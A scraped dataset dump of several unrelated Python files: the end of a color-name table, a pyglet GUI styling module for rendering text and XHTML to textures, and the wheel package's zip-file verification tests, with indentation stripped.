'darkred': Color(.545098, 0, 0),
'darksalmon': Color(.913725, .588235, .478431),
'darkseagreen': Color(.560784, .737255, .560784),
'darkslateblue': Color(.282353, .239216, .545098),
'darkslategray': Color(.184314, .309804, .309804),
'darkslategrey': Color(.184314, .309804, .309804),
'darkturquoise': Color(0, .807843, .819608),
'darkviolet': Color(.580392, 0, .827451),
'deeppink': Color(1, .078431, .576471),
'deepskyblue': Color(0, .74902, 1),
'dimgray': Color(.411765, .411765, .411765),
'dimgrey': Color(.411765, .411765, .411765),
'dodgerblue': Color(.117647, .564706, 1),
'firebrick': Color(.698039, .133333, .133333),
'floralwhite': Color(1, .980392, .941176),
'forestgreen': Color(.133333, .545098, .133333),
'fuchsia': Color(1, 0, 1),
'gainsboro': Color(.862745, .862745, .862745),
'ghostwhite': Color(.972549, .972549, 1),
'gold': Color(1, .843137, 0),
'goldenrod': Color(.854902, .647059, .12549),
'gray': Color(.501961, .501961, .501961),
'graytext': Color(128, 128, 128),
'green': Color(0, .501961, 0),
'greenyellow': Color(.678431, 1, .184314),
'grey': Color(.501961, .501961, .501961),
'highlight': Color(10, 36, 106),
'highlighttext': Color(255, 255, 255),
'honeydew': Color(.941176, 1, .941176),
'hotpink': Color(1, .411765, .705882),
'inactiveborder': Color(212, 208, 200),
'inactivecaption': Color(128, 128, 128),
'inactivecaptiontext': Color(212, 208, 200),
'indianred': Color(.803922, .360784, .360784),
'indigo': Color(.294118, 0, .509804),
'infobackground': Color(255, 255, 225),
'infotext': Color(0, 0, 0),
'ivory': Color(1, 1, .941176),
'khaki': Color(.941176, .901961, .54902),
'lavender': Color(.901961, .901961, .980392),
'lavenderblush': Color(1, .941176, .960784),
'lawngreen': Color(.486275, .988235, 0),
'lemonchiffon': Color(1, .980392, .803922),
'lightblue': Color(.678431, .847059, .901961),
'lightcoral': Color(.941176, .501961, .501961),
'lightcyan': Color(.878431, 1, 1),
'lightgoldenrodyellow': Color(.980392, .980392, .823529),
'lightgray': Color(.827451, .827451, .827451),
'lightgreen': Color(.564706, .933333, .564706),
'lightgrey': Color(.827451, .827451, .827451),
'lightpink': Color(1, .713725, .756863),
'lightsalmon': Color(1, .627451, .478431),
'lightseagreen': Color(.12549, .698039, .666667),
'lightskyblue': Color(.529412, .807843, .980392),
'lightslategray': Color(.466667, .533333, .6),
'lightslategrey': Color(.466667, .533333, .6),
'lightsteelblue': Color(.690196, .768627, .870588),
'lightyellow': Color(1, 1, .878431),
'lime': Color(0, 1, 0),
'limegreen': Color(.196078, .803922, .196078),
'linen': Color(.980392, .941176, .901961),
'magenta': Color(1, 0, 1),
'maroon': Color(.501961, 0, 0),
'mediumaquamarine': Color(.4, .803922, .666667),
'mediumblue': Color(0, 0, .803922),
'mediumorchid': Color(.729412, .333333, .827451),
'mediumpurple': Color(.576471, .439216, .858824),
'mediumseagreen': Color(.235294, .701961, .443137),
'mediumslateblue': Color(.482353, .407843, .933333),
'mediumspringgreen': Color(0, .980392, .603922),
'mediumturquoise': Color(.282353, .819608, .8),
'mediumvioletred': Color(.780392, .082353, .521569),
'menu': Color(212, 208, 200),
'menutext': Color(0, 0, 0),
'midnightblue': Color(.098039, .098039, .439216),
'mintcream': Color(.960784, 1, .980392),
'mistyrose': Color(1, .894118, .882353),
'moccasin': Color(1, .894118, .709804),
'navajowhite': Color(1, .870588, .678431),
'navy': Color(0, 0, .501961),
'oldlace': Color(.992157, .960784, .901961),
'olive': Color(.501961, .501961, 0),
'olivedrab': Color(.419608, .556863, .137255),
'orange': Color(1, .647059, 0),
'orangered': Color(1, .270588, 0),
'orchid': Color(.854902, .439216, .839216),
'palegoldenrod': Color(.933333, .909804, .666667),
'palegreen': Color(.596078, .984314, .596078),
'paleturquoise': Color(.686275, .933333, .933333),
'palevioletred': Color(.858824, .439216, .576471),
'papayawhip': Color(1, .937255, .835294),
'peachpuff': Color(1, .854902, .72549),
'peru': Color(.803922, .521569, .247059),
'pink': Color(1, .752941, .796078),
'plum': Color(.866667, .627451, .866667),
'powderblue': Color(.690196, .878431, .901961),
'purple': Color(.501961, 0, .501961),
'red': Color(1, 0, 0),
'rosybrown': Color(.737255, .560784, .560784),
'royalblue': Color(.254902, .411765, .882353),
'saddlebrown': Color(.545098, .270588, .07451),
'salmon': Color(.980392, .501961, .447059),
'sandybrown': Color(.956863, .643137, .376471),
'scrollbar': Color(212, 208, 200),
'seagreen': Color(.180392, .545098, .341176),
'seashell': Color(1, .960784, .933333),
'sienna': Color(.627451, .321569, .176471),
'silver': Color(.752941, .752941, .752941),
'skyblue': Color(.529412, .807843, .921569),
'slateblue': Color(.415686, .352941, .803922),
'slategray': Color(.439216, .501961, .564706),
'slategrey': Color(.439216, .501961, .564706),
'snow': Color(1, .980392, .980392),
'springgreen': Color(0, 1, .498039),
'steelblue': Color(.27451, .509804, .705882),
'tan': Color(.823529, .705882, .54902),
'teal': Color(0, .501961, .501961),
'thistle': Color(.847059, .74902, .847059),
'threeddarkshadow': Color(64, 64, 64),
'threedface': Color(212, 208, 200),
'threedhighlight': Color(255, 255, 255),
'threedlightshadow': Color(212, 208, 200),
'threedshadow': Color(128, 128, 128),
'tomato': Color(1, .388235, .278431),
'turquoise': Color(.25098, .878431, .815686),
'violet': Color(.933333, .509804, .933333),
'wheat': Color(.960784, .870588, .701961),
'white': Color(1, 1, 1),
'whitesmoke': Color(.960784, .960784, .960784),
'window': Color(255, 255, 255),
'windowframe': Color(0, 0, 0),
'windowtext': Color(0, 0, 0),
'yellow': Color(1, 1, 0),
'yellowgreen': Color(.603922, .803922, .196078)
}
|
Austin503/pyglet
|
refs/heads/master
|
contrib/wydget/wydget/style.py
|
29
|
from pyglet.gl import *
from pyglet import font
from layout import *
import util
class Style(object):
font_name = ''
font_size = 14
def getFont(self, name=None, size=None):
if name is None: name = self.font_name
if size is None: size = self.font_size
return font.load(name, size)
def getGlyphString(self, text, name=None, size=None):
glyphs = self.getFont(name=name, size=size).get_glyphs(text)
return font.GlyphString(text, glyphs)
def text(self, text, color=(0, 0, 0, 1), font_size=None,
font_name=None, halign='left', width=None,
valign=font.Text.BOTTOM):
if font_size is None: font_size = self.font_size
if font_name is None: font_name = self.font_name
f = self.getFont(name=font_name, size=font_size)
return font.Text(f, text, color=color, halign=halign, width=width,
valign=valign)
def textAsTexture(self, text, color=(0, 0, 0, 1), bgcolor=(1, 1, 1, 0),
font_size=None, font_name=None, halign='left', width=None,
rotate=0):
label = self.text(text, color=color, font_size=font_size,
font_name=font_name, halign=halign, width=width, valign='top')
label.width
w = int(width or label.width)
h = font_size * len(label.lines) #int(label.height)
x = c_int()
def _f():
glPushAttrib(GL_COLOR_BUFFER_BIT|GL_ENABLE_BIT|GL_CURRENT_BIT)
glEnable(GL_TEXTURE_2D)
glDisable(GL_DEPTH_TEST)
glClearColor(*bgcolor)
glClear(GL_COLOR_BUFFER_BIT)
glPushMatrix()
if rotate == 0:
glTranslatef(0, h, 0)
if rotate:
glRotatef(rotate, 0, 0, 1)
if rotate == 270:
glTranslatef(-w, h, 0)
if rotate == 180:
glTranslatef(-w, 0, 0)
# prevent the text's alpha channel being written into the new
# texture
glColorMask(GL_TRUE, GL_TRUE, GL_TRUE, GL_FALSE)
label.draw()
glPopMatrix()
glPopAttrib()
if rotate in (0, 180):
return util.renderToTexture(w, h, _f)
else:
return util.renderToTexture(h, w, _f)
stylesheet = '''
body {margin: 0px; background-color: white; font-family: sans-serif;}
div.frame {border: 1px solid #555; background-color: white;}
h1 {font-size: %(font_size)spx; color: black; margin: 2px;}
p {font-size: %(font_size)spx; color: #444; margin: 2px;}
.button {font-size: %(font_size)spx; border: 1px solid black; padding: 2px; margin: 0px;}
a {color: blue;}
'''%locals()
def xhtml(self, text, width=None, height=None, style=None):
layout = Layout()
if style is None:
style = self.stylesheet
layout.set_xhtml('''<?xml version="1.0"?>
<html><head><style>%s</style></head>
<body>%s</body></html>'''%(style, text))
layout.viewport_x = 0
layout.viewport_y = 0
layout.viewport_width = width or 256
layout.viewport_height = height or 200
h = int(layout.view.canvas_height)
w = int(layout.view.canvas_width)
layout.viewport_width = w
layout.viewport_height = h
return layout
def xhtmlAsTexture(self, text, width=None, height=None, style=None):
return xhtmlAsTexture(self.xhtml(text, width, height, style))
def xhtmlAsTexture(layout):
h = int(layout.view.canvas_height)
w = int(layout.view.canvas_width)
def _f():
glPushAttrib(GL_CURRENT_BIT|GL_COLOR_BUFFER_BIT|GL_ENABLE_BIT)
# always draw onto solid white
glClearColor(1, 1, 1, 1)
glClear(GL_COLOR_BUFFER_BIT)
glPushMatrix()
glLoadIdentity()
glTranslatef(0, h, 0)
# ... and blend with solid white
glColor4f(1, 1, 1, 1)
layout.view.draw()
glPopMatrix()
glPopAttrib()
return util.renderToTexture(w, h, _f)
class Gradient(object):
def __init__(self, *corners):
'''Corner colours in order bottomleft, topleft, topright,
bottomright.
'''
self.corners = corners
def __call__(self, rect, clipped):
scissor = clipped != rect
if scissor:
glPushAttrib(GL_ENABLE_BIT|GL_SCISSOR_BIT)
glEnable(GL_SCISSOR_TEST)
glScissor(*map(int, (clipped.x, clipped.y, clipped.width,
clipped.height)))
glBegin(GL_QUADS)
glColor4f(*self.corners[0])
glVertex2f(*rect.bottomleft)
glColor4f(*self.corners[1])
glVertex2f(*rect.topleft)
glColor4f(*self.corners[2])
glVertex2f(*rect.topright)
glColor4f(*self.corners[3])
glVertex2f(*rect.bottomright)
glEnd()
if scissor:
glPopAttrib()
|
neharejanjeva/techstitution
|
refs/heads/master
|
app/logs/venv/lib/python2.7/site-packages/wheel/test/test_wheelfile.py
|
327
|
import os
import wheel.install
import wheel.archive
import hashlib
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
import codecs
import zipfile
import pytest
import shutil
import tempfile
from contextlib import contextmanager
@contextmanager
def environ(key, value):
old_value = os.environ.get(key)
try:
os.environ[key] = value
yield
finally:
if old_value is None:
del os.environ[key]
else:
os.environ[key] = old_value
@contextmanager
def temporary_directory():
# tempfile.TemporaryDirectory doesn't exist in Python 2.
tempdir = tempfile.mkdtemp()
try:
yield tempdir
finally:
shutil.rmtree(tempdir)
@contextmanager
def readable_zipfile(path):
# zipfile.ZipFile() isn't a context manager under Python 2.
zf = zipfile.ZipFile(path, 'r')
try:
yield zf
finally:
zf.close()
def test_verifying_zipfile():
if not hasattr(zipfile.ZipExtFile, '_update_crc'):
pytest.skip('No ZIP verification. Missing ZipExtFile._update_crc.')
sio = StringIO()
zf = zipfile.ZipFile(sio, 'w')
zf.writestr("one", b"first file")
zf.writestr("two", b"second file")
zf.writestr("three", b"third file")
zf.close()
# In default mode, VerifyingZipFile checks the hash of any read file
# mentioned with set_expected_hash(). Files not mentioned with
# set_expected_hash() are not checked.
vzf = wheel.install.VerifyingZipFile(sio, 'r')
vzf.set_expected_hash("one", hashlib.sha256(b"first file").digest())
vzf.set_expected_hash("three", "blurble")
vzf.open("one").read()
vzf.open("two").read()
try:
vzf.open("three").read()
except wheel.install.BadWheelFile:
pass
else:
raise Exception("expected exception 'BadWheelFile()'")
# In strict mode, VerifyingZipFile requires every read file to be
# mentioned with set_expected_hash().
vzf.strict = True
try:
vzf.open("two").read()
except wheel.install.BadWheelFile:
pass
else:
raise Exception("expected exception 'BadWheelFile()'")
vzf.set_expected_hash("two", None)
vzf.open("two").read()
def test_pop_zipfile():
sio = StringIO()
zf = wheel.install.VerifyingZipFile(sio, 'w')
zf.writestr("one", b"first file")
zf.writestr("two", b"second file")
zf.close()
try:
zf.pop()
except RuntimeError:
pass # already closed
else:
raise Exception("expected RuntimeError")
zf = wheel.install.VerifyingZipFile(sio, 'a')
zf.pop()
zf.close()
zf = wheel.install.VerifyingZipFile(sio, 'r')
assert len(zf.infolist()) == 1
def test_zipfile_timestamp():
# An environment variable can be used to influence the timestamp on
# TarInfo objects inside the zip. See issue #143. TemporaryDirectory is
# not a context manager under Python 3.
with temporary_directory() as tempdir:
for filename in ('one', 'two', 'three'):
path = os.path.join(tempdir, filename)
with codecs.open(path, 'w', encoding='utf-8') as fp:
fp.write(filename + '\n')
zip_base_name = os.path.join(tempdir, 'dummy')
# The earliest date representable in TarInfos, 1980-01-01
with environ('SOURCE_DATE_EPOCH', '315576060'):
zip_filename = wheel.archive.make_wheelfile_inner(
zip_base_name, tempdir)
with readable_zipfile(zip_filename) as zf:
for info in zf.infolist():
assert info.date_time[:3] == (1980, 1, 1)
def test_zipfile_attributes():
# With the change from ZipFile.write() to .writestr(), we need to manually
# set member attributes.
with temporary_directory() as tempdir:
files = (('foo', 0o644), ('bar', 0o755))
for filename, mode in files:
path = os.path.join(tempdir, filename)
with codecs.open(path, 'w', encoding='utf-8') as fp:
fp.write(filename + '\n')
os.chmod(path, mode)
zip_base_name = os.path.join(tempdir, 'dummy')
zip_filename = wheel.archive.make_wheelfile_inner(
zip_base_name, tempdir)
with readable_zipfile(zip_filename) as zf:
for filename, mode in files:
info = zf.getinfo(os.path.join(tempdir, filename))
assert info.external_attr == (mode | 0o100000) << 16
assert info.compress_type == zipfile.ZIP_DEFLATED
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.